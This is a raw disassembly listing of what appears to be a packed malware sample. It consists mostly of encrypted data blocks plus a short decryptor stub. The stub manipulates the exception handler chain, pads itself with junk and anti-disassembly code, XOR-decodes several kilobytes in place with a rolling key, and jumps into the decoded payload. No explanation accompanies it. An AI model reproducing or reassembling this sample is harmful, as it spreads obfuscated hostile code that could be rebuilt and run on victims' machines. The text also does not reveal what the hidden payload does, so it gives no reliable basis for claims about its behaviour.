dd 5044347Eh, 1BD2BEB2h, 0A096544Dh, 6F4D1D2Fh, 70ECA3B8h
dd 0B4985568h, 706A181Fh, 2080AFA3h, 0A7A55050h, 78582416h
dd 1F0DADAEh, 0A5B87276h, 61667218h, 419B684h, 0CAB27E73h
dd 13481F1Dh, 1A2AB087h, 0DFAA6D71h, 634D3806h, 0A19B7B3h
dd 0D5A07251h, 41221502h, 10391B1h, 0C1986C68h, 60451E1Dh
dd 0D12D08Ah, 0C2A87E6Ah, 0B700705h, 1225C88Fh, 0E2A2657Fh
dd 7C681403h, 3B3DD6DEh, 0CBB76079h, 6B6E3668h, 3F07D6E8h
dd 0E3A6697Dh, 6B711012h, 1B03E2DCh, 0FDA8787Eh, 6D7F1210h
dd 0B3DB4DEh, 0CDCB5A4Fh, 71612A10h, 3904D1B7h, 0C5CE627Fh
dd 8B773703h, 3A08D2B5h, 0DCDF6364h, 89743C5Eh, 2615DFDBh
dd 0C7D57C6Ah, 89103F31h, 5013CCD4h, 0C0D46175h, 9A602A5Ah
dd 4E10CBC4h, 0C7CD6D4Dh, 836B362Ah, 3F0CC1EEh, 0CED94A67h
dd 0F5683B32h, 2F16C2E2h, 0EAD26F72h, 0B0783313h, 2D0FC5C6h
dd 0F9D08B9Dh, 866B2000h, 2916A9CDh, 0F2C19889h, 81472637h
dd 461CC9C2h, 0FEC595B5h, 84633E23h, 2B3ED5E9h, 0DBC38BAEh
dd 9B6A0750h, 2137D1C0h, 0F8C8A58Eh, 826B0A2Bh, 716A1C1h
dd 0D1FBB4AFh, 0A92E787Dh, 1055D3EFh, 0FBEA949Dh, 0A09B3B22h
dd 1253E4C4h, 0E5E89693h, 8CB7282Eh, 7F29DEE6h, 0F4C0BDF4h
dd 959F3118h, 502ECFE4h, 0E9E68887h, 80AA4206h, 4E28C4FCh
dd 0FACD8AA6h, 0A28E0520h, 3DA21699h, 0E5CE21C5h, 9F43E43h
dd 356DDF1Ah, 8EF7E786h, 0B5A16C10h, 648B1A90h, 0DDCB3161h
dd 8FA17A55h, 0AFD070C0h, 499D3C4h, 4E1134F9h, 3073A134h
dd 469F2565h, 7069BB6Ch, 1D41BB9Ah, 83FF8F1Bh, 42153A53h
dd 2C0FA5C4h, 59C1D67h, 0D5E832A7h, 4A69EFDBh, 0AB1ADBE0h
dd 1F6D305Fh, 2853C5E3h, 178FC9DEh, 0D18E7C31h, 2659D7EFh
dd 2A8DBDDCh, 5A1D7C62h, 2407AD08h, 0EC748C85h, 0CDD001E2h
dd 7E418006h, 62095E53h, 0C73D281Dh, 3033E80Ch, 0A484D1E6h
dd 1B23757Ch, 324CFEF4h
dd 0FC08CFE4h, 0C7DA3F11h, 0E3D02D95h, 0E006462Dh, 48D8120Bh
dd 1A36F2F4h, 90C223D0h, 465DDFDAh, 181B59F8h, 76F34643h
dd 0F33C1E23h, 9DD68C88h, 5B514249h, 0CB129921h, 8DA8FC7Eh
dd 817BC5D1h, 422FE502h, 0D17AA8F8h, 67792B9Dh, 3A93181Dh
dd 2039EB9Ch, 0E8BEF2C6h, 89ECF69Eh, 5F753A6Fh, 3224EF95h
dd 9BCB81E6h, 898695Dh, 0ACE642E6h, 0E8C8223Ch, 5F1D63A9h
dd 5F71BB28h, 5E474D15h, 82B7FDCh, 0C8E246D4h, 0B1F41493h
dd 26D43137h, 5B47B798h, 0C9CEC892h, 1ED1E4A2h, 79A6B58Ah
dd 0B7088FC8h, 2315F53h, 9434B392h, 0AAD40967h, 73EC6E9Eh
dd 0D0724EB2h, 0C14C72CBh, 0FE115B54h, 503D603Fh, 12363959h
dd 0FC2040B9h, 50691539h, 2F310407h, 0FA0F5853h, 844F56B3h
dd 50728865h, 0FD7A39FFh, 0A6964FE9h, 0AE7F81C1h, 0A5D9DC00h
dd 1F326027h, 0CDE6416Bh, 61F3A93Fh, 49518737h, 15B93B7Ch
dd 0C3265DC1h, 0CB8882A9h, 9A74FA14h, 0F2E05239h, 845EF021h
dd 0B0466E94h, 75035062h, 8668ADAFh, 12B549BEh, 0C028B9C4h
dd 0C8BB54A6h, 640796B9h, 2CE33999h, 445749F0h, 18F6F5FAh
dd 0DE1B3CA2h, 0B8C814A4h, 1BA9C3D5h, 0ECF66C32h, 41EA19ADh
dd 7A26F1F7h, 0EAFC4444h, 3E55F3F4h, 15AEFF5h, 0E8CA6863h
dd 0B9C26515h, 92A2E9D7h, 0E6921248h, 3B4D9374h, 0C4F3BDF1h
dd 71091746h, 397BB9BFh, 191220DCh, 0E2F43F40h, 3523C2C9h
dd 0E49C8DBCh, 0A0F23C42h, 0C4D26EC4h, 1C9BD5C0h, 8584CCC5h
dd 372DDBC4h, 0DF99E3E8h, 0FCCA8CC1h, 0CE438D90h, 0B6BB3872h
dd 1A696F3Ch, 3BA29DE4h, 0EE4154B5h, 8FBB663Ah, 58AA76D8h
dd 0DB93EDCFh, 69DF2BDh, 0E6A878DAh, 0D91EBCAh, 83B47461h
dd 0A463C1E0h, 7E8EDD48h, 12D78534h, 0D46093E2h, 2CDD8776h
dd 80B27C62h, 0DCA27ED4h, 0FB8BE5F0h, 0CEE222F4h, 7418084h
dd 0B11C2CD1h, 9FDE1802h, 0DFAE87Dh, 0B4DAD1E7h, 0F45C2628h
dd 59300E8Ah, 61F9425Eh, 0D139241Ah, 0D2FECF3h, 0A380CDE3h
dd 420ADD7Eh, 0E4A578BCh, 7F81CBD1h, 0C4D6D0A2h, 2315F57Ah
dd 0EE39D9BAh, 46DB1E1Ah, 17297399h, 195DF94Dh, 0FE535AD3h
dd 52693826h, 0A5F0E7BEh, 0F1D15CE6h, 7974A15Fh, 3B2F92C9h
dd 900F8DE1h, 2A7A6D42h, 0D9F2CE06h, 53CC161Ch, 0F216BC1h
dd 36258144h, 3DC54253h, 0D1F69CBh, 0CE7B7B40h, 32C71F24h
dd 0B1D67F5h, 93049BFDh, 0BBFC2CBAh, 91BE9EFh, 7E6214BFh
dd 8FE42E34h, 737C0449h, 60C1C8C8h, 31BE7932h, 6D379E18h
dd 2B1EC1CFh, 0DEC37491h, 763A705Eh, 0A72E75D1h, 168F070Eh
dd 1137A72h, 0A9355340h, 9A906F99h, 0AFD16860h, 0BC36E0E5h
dd 0A8BB0503h, 9367351Ah, 3604C0DFh, 772FFB08h, 7E0F6970h
dd 6352DA71h, 5F3C8ACFh, 0A80E6876h, 4E60ADC7h, 0F4E95380h
dd 2298A808h, 0C1629C81h, 90AC7197h, 3C3F0656h, 1831FAFFh
dd 0B495151h, 0F33B7955h, 0B744AE2Eh, 0AD9F336Bh, 72CAAB53h
dd 774BC725h, 5F4BFDFDh, 0F5230DD9h, 465CA64Fh, 7631A7FCh
dd 0F035522Ch, 7519192Dh, 2F25F8CBh, 0EF337D1Bh, 0C9D359A6h
dd 999CC6BDh, 6B8AEEBCh, 436690E7h, 0A8956172h, 69FC497Eh
dd 4164AE95h, 1EC0F07Eh, 15FD475Fh, 0F7EF535h, 0C86F1BF5h
dd 818D200Eh, 6D0CFFFDh, 0FBD7979Bh, 0AB95222Bh, 4921F5F9h
dd 4291EC88h, 12A58ECDh, 0D8CFC443h, 8DE080ECh, 88A768BDh
dd 8CFF1980h, 359ED8F0h, 0E0F33D55h, 0CB05961Bh, 0EC631914h
dd 93F5B6EBh, 33469094h, 0CF174F8Fh, 38DD923Ah, 0D3EFE83Eh
dd 0B50D6F1Ch, 8EED070Ch, 0D0108AFAh, 0B4BA7970h, 0FC9FBE3Ah
dd 35840986h, 79B1E66h, 0D6E9329Dh, 0B5688E6h, 0D692DCE0h
dd 41183A5Ch, 290CAA2Bh, 0F59C8454h, 4F6C3F7Ah, 270AB4BFh
dd 4CB55554h, 33622D02h, 2AC77286h, 7AE6858Ah, 7B1E2D5Ah
dd 2306B0B7h, 54CF4126h, 338F291Eh, 11044D37h, 0BB1D2DD7h
dd 92DD1707h, 10A1BC05h, 74878451h, 0F35A432Ah, 11442033h
dd 1F113180h, 2FD91304h, 1B2E793Dh, 704A725Ch, 73D82126h
dd 6DA16834h, 6AE8D5FEh, 95D51F25h, 3B0BE187h, 3B28C8FDh
dd 0EB3A88DDh, 56A37246h, 0E1BFC5F7h, 6DD26370h, 980602FFh
dd 5CF7DC83h, 0BF62482Dh, 105CEFB1h, 141D91A2h, 482F1268h
dd 268F8729h, 16FDE4C9h, 4BC84C3Eh, 23C38E5h, 613ABA74h
dd 34FD98CBh, 45959B6Fh, 5FC735C9h, 3FC72126h, 3EA95D5Ch
dd 2C708A8Fh, 85702497h, 3C1A5458h, 6C5E8308h, 0C1400212h
dd 36E79D99h, 19D93F7Bh, 27C13B20h, 332627E9h, 323AE4B9h
dd 0ADD5590Dh, 1145E0Ah, 0D397E537h, 0AA8D1274h, 0D4E3C99Fh
dd 0D998B185h, 0A88C1372h, 0F2EEA3DDh, 0AD998B37h, 953E8CF7h
dd 91106A6Ch, 665C5B1h, 0C52FFB56h, 720F6976h, 7E54E92Ah
dd 0A059C204h, 0F7640808h, 605E3852h, 25310232h, 0F53D671Dh
dd 4A087820h, 0CE85FE52h, 0C33FE3ABh, 0DD9EAB99h, 9D85D3A7h
dd 0C239D1D8h, 43D6A998h, 512602D9h, 7A086279h, 0F3D69BF4h
dd 9B81CBB7h, 0C41C04DAh, 0D0705B2Dh, 9A9FC9CCh, 0DF43C3DBh
dd 6FF4A395h, 634F5C38h, 0F376C9C2h, 1206A194h, 0C9FAA5AAh
dd 0C101DFB1h, 0BD059F93h, 0A7823E6Dh, 98DB8B4Dh, 2569B79Bh
dd 0F9C59098h, 0A9C6222Eh, 5234F3ECh, 0BD97DC98h, 0CB96282Dh
dd 6F4FA8B0h, 0D4F7BEABh, 90BB1E0Ah, 5428E5E9h, 0E1CEA884h
dd 8F993231h, 643FF0CAh, 0FBED8CBDh, 92915D2Ah, 5721C0CBh
dd 0CAF9829Eh, 0AC975F22h, 5517CDE6h, 0ECF68498h, 0AE825F4Bh
dd 402CC9CFh, 0EBF8948Dh, 0B7816851h, 6C3AEEF8h, 0EBF695B5h
dd 0BD9E575Fh, 482EF9DFh, 0DFF0B38Dh, 0BF9E4178h, 5656FBE2h
dd 0F1D2B987h, 0B6815E47h, 4554F3EAh, 33CDA88Eh, 0D392435Ch
dd 7C7DCADAh, 38DD9889h, 0B28D636Fh, 494AECF5h, 2CD1A3BAh
dd 0A0864258h, 676BF2F2h, 1CF9A7AFh, 0A8B65E41h, 4D5C0CF1h
dd 0FCC8FB6h, 0B9B1445Dh, 74330FE4h, 10E0A3B7h, 0BAB36E5Fh
dd 1E337B0Bh, 1D09FD4h, 0B5AAF4A6h, 71460112h, 1AF7A3FCh
dd 0B5B44C55h, 7444591Ah, 2181A4B6h, 0E39D636Ch, 624E0216h
dd 40AB3A8h, 84874B29h, 5C4B5325h, 4B338E83h, 0CDBB6A07h
dd 1E140401h, 697B2D9Fh, 3C8D1A1Fh, 2205899Eh, 8FC05C8h
dd 0BBCE2808h, 3C0EF88Eh, 8DB6C1F6h, 0D39D6204h, 0EF94E071h
dd 3A758FEFh, 0C2E428B5h, 329E0F47h, 4206A03Dh, 9939AF9Ah
dd 7C96675Bh, 39D4ECC2h, 0BD439DB0h, 871B5542h, 6D448D3Bh
dd 0F74DF413h, 0F857EF9Dh, 0B96C0647h, 507781DEh, 6C175149h
dd 596BB4BEh, 9455F559h, 0EB156F4Fh, 5769B331h, 0BE178D80h
dd 6A435D51h, 0AA69DBB6h, 99904F9Eh, 0DA6DD85Fh, 2213B4BCh
dd 0A7BB0DE1h, 0BF56095Dh, 1D29EB9Ch, 0B82FFB07h, 0F10F6977h
dd 2570DA70h, 0CB515307h, 7F1A7A0h, 7D48743Bh, 0D5788703h
dd 1EDDA855h, 4B62ACA7h, 0C0F44752h, 0B022051Ah, 0B661E7E6h
dd 0AE99E26Ah, 0A4BBC54h, 0FDD25656h, 9D83D101h, 0F209563Bh
dd 0D2A2F1A8h, 9C81D7DCh, 0F1065DBAh, 141FF9A7h, 0C9EAAFB5h
dd 0A4411202h, 0BA0FA3E5h, 0AA861E6Eh, 0EF05A450h, 0C0BA1A5h
dd 0CAFFA6B5h, 7BFF1C4Fh, 4365B44Dh, 0C9F83ACAh, 86AF4B24h
dd 4153F5A3h, 69F1B1F7h, 0DAD7B7D9h, 0C0A918A0h, 19F5CC81h
dd 0D8D6BBDFh, 0A6C2149Eh, 0F8A3DDD4h, 0FC901048h, 6A4D979Ch
dd 0E53414A1h, 1BF6706Ah, 960580Fh, 8E9401EFh, 0B1A13E44h
dd 57AC1DDh, 0C0D1A3C3h
dd 0A167C342h, 0DD47A1BAh, 8A9BE5E1h, 0AC804937h, 5531E1FDh
dd 77C9E3A8h, 0ECC5E1ABh, 0D4C60492h, 8997D1CCh, 8861BB0Dh
dd 0A641BB89h, 0B4B92860h, 4D15653Ah, 2D0FA5CFh, 8297B570h
dd 63653238h, 2B0D9ED3h, 5D2C56B8h, 3CE6001Ah, 0D6C47776h
dd 0DA0A1EB9h, 0D2E41E14h, 819C00D8h, 7C8DE7FDh, 0F086B9BFh
dd 716781B6h, 7AE1D4B1h, 0CEE24262h, 0B6CAFF84h, 78B9FF38h
dd 0B984E8ABh, 0B6BEF0A0h, 2487E1F7h, 7F512046h, 1F015B24h
dd 24D59981h, 5D25767Bh, 1D1F559Bh, 0AF16328Bh, 0D81204h
dd 2B0389F9h, 1E69CBD1h, 3B29DFD4h, 293908F7h, 22FA0ECFh
dd 94D42E31h, 0FF1A2C2Ch, 93823594h, 0D59E99E5h, 41717146h
dd 2093F194h, 792FE5D2h, 233023F1h, 370195C9h, 4EF5F02Ah
dd 94E4928Dh, 6647D48Bh, 0EEBA734Ah, 8AACA243h, 64458F8Ah
dd 0E99B454Bh, 5C4E383Eh, 4E46283Ch, 23371228h, 0B2D4B41h
dd 156E5300h, 0B4CAF862h, 4148656Ah, 0E2EEEF3h, 0FE80205Dh
dd 92E66324h, 5C5D9BFCh, 0B0C200FAh, 565F3266h, 3B3DC1DEh
dd 0EFA57F7Ch, 96EA0F64h, 58599860h, 530B859Dh, 69136D4Eh
dd 5667B17Fh, 55BC6C5Ah, 0CF3D42F5h, 86F33DB5h, 25BB3515h
dd 0CD3D9DE3h, 537F9B3h, 8D5F91F7h, 3F8C596Ch, 0BFF123BDh
dd 0F4B93319h, 0AF0F320Dh, 4E61C5FDh, 71478204h, 8F74AB0h
dd 7EDF2F52h, 0A0B73117h, 7D645D22h, 0B561ABB8h, 0AE9A6995h
dd 0F307BD54h, 1B37AAA9h, 0AEFFBDB1h, 0BE4D7D61h, 0D2A1A8E4h
dd 9C82D0BCh, 0F10039C1h, 0F3D1A6A7h, 9B80E24Ah, 5DB8C208h
dd 0AD5A948Ah, 65510977h, 0EF0341B8h, 0A11F5A5h, 0CDE9B8B3h
dd 0A24D0F61h, 2C35FA4h, 1DAAC4D5h, 0D97B468Eh, 0D2549EA0h
dd 96A8F79Fh, 1E48CA4Ch, 6652ACB8h, 0B86F4D78h, 0BD13457Ah
dd 0BEAF656Fh, 0A288234Eh, 62F64348h, 3B4E9A8Ch, 91320070h
dd 8CA34146h, 394C979Bh, 0A20D7F10h, 26743F74h, 374A9508h
dd 0E64A63BDh, 750C6F42h, 3578BE5Bh, 0FFC5266Eh, 0CD79534Dh
dd 0A6B99094h, 88AAC880h, 616CDBD5h, 3174AE34h, 0BB197E7h
dd 0EACD9DB9h, 0BABDDC90h, 84A6CC5Ch, 5CE4F5BFh, 2D408B07h
dd 9989E68h, 59D9CC38h, 1B1E2E09h, 7E171AE1h, 0D5E70118h
dd 285686E0h, 0EB6FD8B5h, 0D2D503F1h, 28C57C0Bh, 7C8FB859h
dd 456EBE32h, 2508A224h, 29DEC6B1h, 0E254BECFh, 0E3B380B4h
dd 79CA51D6h, 7152292Eh, 21045E46h, 760DA66h, 0A222D8DAh
dd 1F327C14h, 0FD60FB8Bh, 378F011Eh, 2D1C4BEBh, 0A03943D3h
dd 77D91308h, 0ED7C907Dh, 0E50F332Eh, 0C4E70199h, 0D447610h
dd 3C80CACFh, 340E077h, 9A2A4454h, 0E16AEC89h, 0F0E352B7h
dd 0A3272276h, 4E384DC1h, 0B631DA34h, 1273A76h, 2268C683h
dd 988B121Dh, 1EC5EE7Ah, 37702206h, 0AAE95317h, 82725E8Fh
dd 545A3F78h, 0B8D7FD1Ah, 23056A6Eh, 4C54C6F5h, 8CE93D38h
dd 253B4D49h, 1857C4F9h, 0BEB43436h, 47552920h, 0A127BA9Fh
dd 82EEEA81h, 0ABDEE568h, 366EB8BDh, 0E3945D12h, 29D9F799h
dd 0D7E7B68Bh, 0AEF11E22h, 18F5600Eh, 9677DD2h, 0ACBF0CE6h
dd 65317862h, 0A93FB2BDh, 9A96E299h, 0F3D6DF60h, 3C6C5AE5h
dd 0A8BC0602h, 0DDC9E6D3h, 131B083h, 8A7A90F7h, 3B955A6Ch
dd 0E5E8FBCFh, 0A48A28F9h, 0EC3DFCD9h, 0C364AE9Fh, 9297FD89h
dd 9DC07358h, 1F35FCADh, 8C0597FDh, 0D8E5766h, 0DB4DD2ABh
dd 2B3AFF8Bh, 0F33C7AABh, 0E693A619h, 75D5EF8Bh, 0DF5A209h
dd 0A448DBC9h, 9DC470F4h, 3E83B8B9h, 0FBD0698Ch, 9B81D703h
dd 781F4A2h, 0BA081C4Dh, 0AA83486Eh, 80B9CE50h, 455993B0h
dd 0A9C5DD8Eh, 11024C3Ah, 737BC831h, 661675F9h, 0ED007A60h
dd 0C7928ED7h, 9799D35Eh, 0EBFE484Dh, 6EAD1867h, 7CA7F1C6h
dd 1603B843h, 3E5559C2h, 0BD5A5A79h, 18AC4479h, 0C639408h
dd 6E5B6EF2h, 0E543C648h, 0BFC4979Bh, 8F91DBF3h, 1CA0402Fh
dd 867C80Ch, 825F6CEEh, 0E1F49AC7h, 6689B897h, 0DB9E8DBCh
dd 0DF9A3D2Bh, 62879195h, 0A26A7015h, 25733A0Fh, 0C1806Ch
dd 0E99E3ECh, 0EBDE3FB8h, 3BCE0091h, 897D1D6h, 0E9DC25AEh
dd 4413DA8Fh, 166A8FE4h, 0D7DA182Ch, 23C0710Eh, 8197DD66h
dd 2AE85837h, 1A0D803Eh, 6E0424E0h, 50E60019h, 0AC347A71h
dd 7D8FDA37h, 0E1FFABBAh, 0EF0A83B7h, 2BDC14DFh, 9EE64660h
dd 1430347Ah, 0EC74D5EAh, 0CDD001DAh, 0A63ABF06h, 7789D01Dh
dd 4E57E11Eh, 20034D9Eh, 1DD68087h, 0C9D32634h, 5BA4842Fh
dd 0F685FFF8h, 0B95E2BE9h, 952F797Eh, 41B3EE57h, 8E53E127h
dd 7A7ECF43h, 0BDB2CBD0h, 3221E126h, 9DA2948Eh, 6D4FF9E1h
dd 79E855A8h, 162968BBh, 0AA7E15FFh, 5E25EDD6h, 2400F4FCh
dd 66B8C5FAh, 44D651A8h, 41A85990h, 24CECCD0h, 0F21E1B09h
dd 130BAC1Ah, 3A4D4016h, 40A27F6Ch, 8D68751Bh, 1174B3BEh
dd 8B819FC6h, 0F0B2BE6h, 25FEAD80h, 6C3FED5Fh, 8F26A648h
dd 5F418BDBh, 0F74D49D6h, 8092694Dh, 5D6FB906h, 8007CE20h
dd 36375455h, 6A438792h, 0E4B64231h, 747B0F17h, 37029BDBh
dd 0A7CD6569h, 647C6340h, 3204D2CAh, 0C8CC7B2Dh, 747B7F5Ch
dd 7A5DC1C2h, 0E2C84824h, 8E7D352Dh, 3D0F9ED5h, 0D5946A6Fh
dd 952F753Eh, 71479E8Fh, 0D1DE6D70h, 0DA3E6433h, 280DCBD8h
dd 9284776Dh, 817A2B79h, 6F5EC8C2h, 0C5CA6D61h, 0C6372532h
dd 645E928Eh, 0FEC56768h, 0F9323338h, 0C29F20A0h, 0AE85E472h
dd 7044E454h, 0E6ADAD40h, 0A232F48Bh, 9C7A1927h, 0CC9E53DDh
dd 873C7003h, 41066062h, 43B2269Bh, 75DA570Eh, 852B71D1h
dd 441E2851h, 457228DEh, 0A040718Fh, 0AC22F8E1h, 7155DEB5h
dd 0EE004863h, 4355C7CCh, 6941A8F9h, 9801B7B3h, 5ADE1682h
dd 1BA7C1C7h, 25D74778h, 0C6D16EEh, 13011C08h, 0E984C993h
dd 1AFA2C13h, 615FEDC3h, 297381ECh, 86C09C77h, 9091C50Eh
dd 0D729CBBAh, 58773953h, 0F4A3EF9Dh, 0C2D83C33h, 4315AF32h
dd 0F8B3DB01h, 95F2009Fh, 0BE7A727Eh, 0D91E23EAh, 0DEF00A70h
dd 761DCAA9h, 0B5AB97E9h, 0DCBC7B6Dh, 0CE66A6E6h, 0BB971E18h
dd 0DAA16274h, 7F7C99E4h, 0F0958FADh, 8BAB0931h, 0A83089DEh
dd 7D6C23A2h, 0E6BBB7C6h, 18D687BCh, 7F6F4408h, 0E9E5BBC9h
dd 6A75CCDDh, 80A85DD0h, 85D9D1CBh, 2877D6CBh, 8373CB59h
dd 93B511CDh, 0A138B3B5h, 85742BCAh, 9AB37A0Dh, 25B170CBh
dd 4B762C27h, 31F0C0F5h, 0A53C827Dh, 89782C2Eh, 0DC34F41Fh
dd 0F7317B80h, 8B7A318Ch, 0C8DA24C2h, 0F0AE247Eh, 72B3E4EAh
dd 0C6D910C1h, 29D2137Ch, 40A27E5Ah, 4DB22016h, 4A96F558h
dd 6F7FF9FFh, 6C3C1451h, 0FED68C86h, 6C7DC6DEh, 8DEC9D44h
dd 1DA27E2Ch, 0E17BC5CAh, 60D3267Eh, 431EEE12h, 90FCCC8Ch
dd 4BCE181Eh, 31237B31h, 0E378C1C7h, 0BACC16F7h, 0D7D2886h
dd 64943BCAh, 0C64B141Ah, 2D3F494Eh, 0B6F7B2E3h, 5EC81218h
dd 0F4E29ACBh, 60B839CEh, 0F64D1016h, 1951EE62h, 5A1C7894h
dd 0B72FCE27h, 4D90AB6Bh, 77E83EADh, 58C23C22h, 0FAE89C30h
dd 5A6B1A53h, 895D8110h, 156F54h, 68599824h, 50D0E00Eh
dd 851CA29Dh, 5667B138h, 9A9FB387h, 0A19A5B50h, 0BCB8B389h
dd 5744F85Dh, 0B791272Ch, 5265CF97h, 0F0448FE8h, 761B235Fh
dd 6074AE04h, 0B4C30006h, 0F908ABE3h, 0EB90FAAFh, 0A05B03B5h
dd 0A952F3ABh, 0DE53A3FFh, 0A035868Fh, 7C6A5656h, 0B59E303Bh
dd 7B66E8FFh, 7851AAABh
dd 263A6E3h, 9BF573EEh, 7B211078h, 475EF72Fh, 0BCF43BFDh
dd 0D1277172h, 0CD74ED2Eh, 1E3BEAB6h, 0F0357F76h, 3652EE9Fh
dd 92E471F8h, 6C130F51h, 0CF58FAC6h, 0A99CD97Fh, 0E6434A4Fh
dd 7006E3A5h, 0BA21902Bh, 0B4FDC62Ah, 71532321h, 99A8F2C7h
dd 1501D3C8h, 1CE7635Fh, 6BA6C0C5h, 0D8D728DFh, 22E5659Eh
dd 6DA4DEC3h, 0D6D28EDDh, 30C3159Ch, 1DA2DCC1h, 0D4C752D3h
dd 531EC79Ah, 891515EFh, 1DF50F74h, 766F10Dh, 8B2B17EDh
dd 1FF30D72h, 5635F03h, 75296BEBh, 21F10B6Eh, 3769321h
dd 1D65B2E9h, 0DCDF1563h, 1432B11h, 4598E2D7h, 0DAED37D4h
dd 2E28D190h, 0AE7B0D64h, 28B3350Ah, 55C54B81h, 794EEF6h
dd 1E6AF0F8h, 0EA317873h, 0B087A464h, 0C4DAF236h, 5C3CAC8Ah
dd 211BCC3h, 0A3892310h, 0CF5A97FDh, 83712719h, 8B0B2847h
dd 0CDC77D7Bh, 85732909h, 0E31E0551h, 3102D6FCh, 788AF161h
dd 6937492Eh, 54CB817Dh, 52CC59EEh, 3568AA1Ch, 94324CAEh
dd 0F5E0D885h, 0BBD92310h, 1D582C5Bh, 0F98431D3h, 94D949ECh
dd 0B2BB872Ch, 0F382FCFDh, 0FA5629E2h, 45134926h, 0A803C9BAh
dd 3FDDF720h, 68C28B87h, 0D813732h, 0C0A7A5E1h, 0A4C37276h
dd 6A7CE973h, 0BEC1F320h, 33E47074h, 684A7CC9h, 0BF27191Eh
dd 0D3246E72h, 32F5C2E3h, 94001B38h, 732294F3h, 649EA0DCh
dd 33CB151Ah, 50104E3Ah, 8FF5A448h, 0B6F938AFh, 0F4F06F84h
dd 64B0DD3Eh, 0Dh dup(0)
; =============== S U B R O U T I N E =======================================
sub_3142BC00 proc near ; CODE XREF: sub_3142BC1D+2E�p
pusha
push ebp
mov ebp, esp
call near ptr sub_3142BC1D
call sub_3142BCCC
push dword ptr fs:0
pop ebp
lea ebp, [ebp+8]
jmp loc_3142BC71
sub_3142BC00 endp
; =============== S U B R O U T I N E =======================================
sub_3142BC1D proc far ; CODE XREF: sub_3142BC00+4�p
var_34 = dword ptr -34h
; FUNCTION CHUNK AT 3142BCE4 SIZE 00000010 BYTES
push dword ptr fs:0
mov fs:0, esp
xor ecx, ecx
push 80000000h
push 80000000h
push ecx
push 80000000h
push ecx
push 8000h
push 80000000h
push 80000000h
call sub_3142BC00
xor [ecx], esi
leave
push 80000000h
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push 2
push 10h
push ecx
push ecx
push ecx
call ds:dword_3142808C ; LoadLibraryA
loc_3142BC71: ; CODE XREF: sub_3142BC00+18�j
sub eax, eax
loc_3142BC73: ; CODE XREF: sub_3142BC1D+5C�j
dec al
or al, al
jz short loc_3142BC7D
jnz short loc_3142BC73
jmp short loc_3142BCE4
; ---------------------------------------------------------------------------
loc_3142BC7D: ; CODE XREF: sub_3142BC1D+5A�j
sub ebx, ebx
sub ecx, ecx
mov cl, 7Ah
loc_3142BC83: ; CODE XREF: sub_3142BC1D+67�j
inc ebx
loop loc_3142BC83
call sub_3142BCC8
add edx, 4Eh
sub ecx, ecx
xor ecx, 243Ch
push edx
loc_3142BC9A: ; CODE XREF: sub_3142BC1D+92�j
xchg al, [edx]
xor ax, bx
xchg al, [edx]
add edx, 1
add bx, 0CEh
sub ecx, 1
cmp ecx, 0
jnz short loc_3142BC9A
pop edx
mov esp, fs:0
pop dword ptr fs:0
leave
mov [esp+48h+var_34], edx
popa
jmp edx
sub_3142BC1D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_3142BCC8 proc near ; CODE XREF: sub_3142BC1D+69�p
pop edx
push edx
retn
sub_3142BCC8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_3142BCCC proc near ; CODE XREF: sub_3142BC00+9�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_3142BCCC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0EAh, 0A0h, 16h
dd 0C580B2E4h, 64FCE18h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3142BC1D
loc_3142BCE4: ; CODE XREF: sub_3142BC1D+5E�j
jg short loc_3142BCEC
lock mov esi, 76285A8Ch
loc_3142BCEC: ; CODE XREF: sub_3142BC1D:loc_3142BCE4�j
dec ebp
or cl, ah
pop es
cld
retf 3A13h
; END OF FUNCTION CHUNK FOR sub_3142BC1D
; ---------------------------------------------------------------------------
dd 0B3A40610h, 66816390h, 0E405B14h, 6FCC1255h, 0C630E214h
dd 0B6E83E63h, 0ED2D276Ch, 267CBA24h, 5CCB49F4h, 9E23C9D3h
dd 0EA31AAEFh, 35C76A9Ch, 0BFE5F78Fh, 73ACFE60h, 2FE01244h
dd 19E84A9Fh, 18BD034Bh, 0DD88FAFCh, 3C4D658h, 86CC16E9h
dd 0FE30DB94h, 929B9ACCh, 3AEEA985h, 0D3AB6354h, 0E253C979h
dd 70507E21h, 0BD08A65h, 6D39E268h, 0BEF02354h, 0A6A3B8F9h
dd 0A5B391BCh, 2C13EA8Eh, 0CF23012Ch, 57CB39C1h, 49408DDCh
dd 5D0DDEB9h, 2EB39A95h, 0C38B753Eh, 0E958D396h, 543CEEFDh
dd 2611CB81h, 0E5BB9F27h, 2C054664h, 0C565334Bh, 0B554AEFDh
dd 75F1FE7Eh, 0AA571DB7h, 0FA62C132h, 2ADB79B7h, 0BE7BB96Bh
dd 8EC0F228h, 0B597461Fh, 90512AF1h, 360DF6A8h, 0E7762D57h
dd 0E6ED36B9h, 0DE1DAA74h, 640B7AACh, 2BF4D381h, 0E8DD9C59h
dd 0EDF06320h, 73A18C73h, 2E20A784h, 6698C714h, 0EAB54534h
dd 0A27B5B20h, 613200E1h, 0B92BAAAEh, 3A356BC2h, 5EE85A79h
dd 0EE2052F4h, 72C4A39h, 1A053DA4h, 13C8BA19h, 431047A4h
dd 4629B819h, 0C12028D4h, 76A8B4E4h, 519CF944h, 0A62D76E9h
dd 2FD575B4h, 5688FAD8h, 0FA40F224h, 0F34DA742h, 753022A0h
dd 926CBEB0h, 0DC3D59A1h, 2DD84A05h, 9E29F4C1h, 0ACF5F1ACh
dd 1380F2DDh, 86D2B0DFh, 0BE9A223Eh, 0F7405AE6h, 0A56096C4h
dd 3698A038h, 5A5B0E5Eh, 825ED893h, 0E4041FBh, 9C9063EFh
dd 0F34F1DEBh, 0F6F9BBD9h, 0BF710084h, 66CD75ECh, 0DD9082C1h
dd 1C0BDAE8h, 0EC5F8B96h, 16086A9Ch, 0DCA6A094h, 0B5619F5h
dd 180D681Dh, 0AD6BB888h, 0F8F87DDCh, 0CDDB08h, 581868EDh
dd 3C197D03h, 0F1CBA818h, 0A8195962h, 0E166ED37h, 0DA5BB8C8h
dd 0EAB70009h, 8B0A18CAh, 0E166BD79h, 0E6CA78C8h, 3BFD6E8Fh
dd 89A8981Bh, 6D505D31h, 0BD65B8C8h, 0F8F87DE3h, 35E5913Bh
